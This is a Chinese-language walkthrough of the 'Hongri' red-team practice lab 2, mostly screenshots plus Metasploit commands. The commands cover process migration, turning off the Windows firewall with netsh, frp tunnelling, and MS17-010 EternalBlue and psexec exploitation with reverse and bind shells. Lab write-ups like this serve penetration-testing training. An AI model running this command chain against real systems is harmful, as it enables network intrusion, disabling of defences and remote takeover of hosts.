红日靶机二
![](https://upload-images.jianshu.io/upload_images/4664072-27baa962a303bce5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-a0dd73c931d5230c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a2f7eb7180213372.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-dd9feb4705f64b84.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-aac109f942baf2e8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
失败了 换一个漏洞
![](https://upload-images.jianshu.io/upload_images/4664072-d3b395395fa84410.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-894b433f0212ca6b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-5a86643a37829fbe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-da0c585ce8c0a0f8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-cac2f62a361698dc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
木马上传
![](https://upload-images.jianshu.io/upload_images/4664072-7d43f3da1d9b2bad.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-9864f1e46324c7a4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-107ebfa1e204e804.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
meterpreter > background
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.1.128 - Collecting local exploits for java/windows...
[-] 192.168.1.128 - No suggestions available.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) >
![](https://upload-images.jianshu.io/upload_images/4664072-9a7c22100eb3ccd7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-bad5522091fdbd3a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
迁移进程
![](https://upload-images.jianshu.io/upload_images/4664072-862003190c10f232.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
自动迁移进程
run post/windows/manage/migrate
提权
![](https://upload-images.jianshu.io/upload_images/4664072-bbd632040fa6e198.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
设置心跳
抓取密码
![](https://upload-images.jianshu.io/upload_images/4664072-68b44543d389a1ee.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
进程
![](https://upload-images.jianshu.io/upload_images/4664072-92f7bb41b151f3e7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-00c24584c9f3a05a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
扫描10段端口
![](https://upload-images.jianshu.io/upload_images/4664072-330934574d97f37c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
查看用户
![](https://upload-images.jianshu.io/upload_images/4664072-7f34f13e68a3d400.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
域内信息
![](https://upload-images.jianshu.io/upload_images/4664072-bacec9f7161830f3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
查看防火墙并关闭
shell netsh firewall show state
shell netsh advfirewall set allprofiles state off
![](https://upload-images.jianshu.io/upload_images/4664072-7d136a3c71f6afd5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
横向移动
伪造票据
![](https://upload-images.jianshu.io/upload_images/4664072-07e01b2f86e64cc6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-4be2ec570a6b6359.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-88e4c45752a4a1af.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d438613f80a84495.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-8be6f0fa327d30c0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a74b960072ff9cec.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf
修改frps.ini文件
vim frps.ini
![](https://upload-images.jianshu.io/upload_images/4664072-fd6ad65b30c4d325.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
启动frp
./frps -c frps.ini
修改frpc.ini文件
frpc.exe -c frpc.ini
添加路由
route add 10.10.10.0 255.255.255.0 1
route print
![](https://upload-images.jianshu.io/upload_images/4664072-2d066f6b0a293305.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.10.10
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
![](https://upload-images.jianshu.io/upload_images/4664072-8fcc20c59827b6f3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
尝试利用
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 4440
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.10
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
![](https://upload-images.jianshu.io/upload_images/4664072-e0f7a5b4a947dd51.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.10
rhost => 10.10.10.10
msf5 exploit(windows/smb/ms17_010_psexec) > set rport 445
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/x64/shell/bind_tcp
payload => windows/x64/shell/bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > run
![](https://upload-images.jianshu.io/upload_images/4664072-cf205cca1cc07977.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
学习文章
https://www.jianshu.com/p/45ad9a534fb4
https://www.cnblogs.com/R1card0/articles/12960290.html
http://yugod.xmutsec.com/index.php/2020/07/15/53.html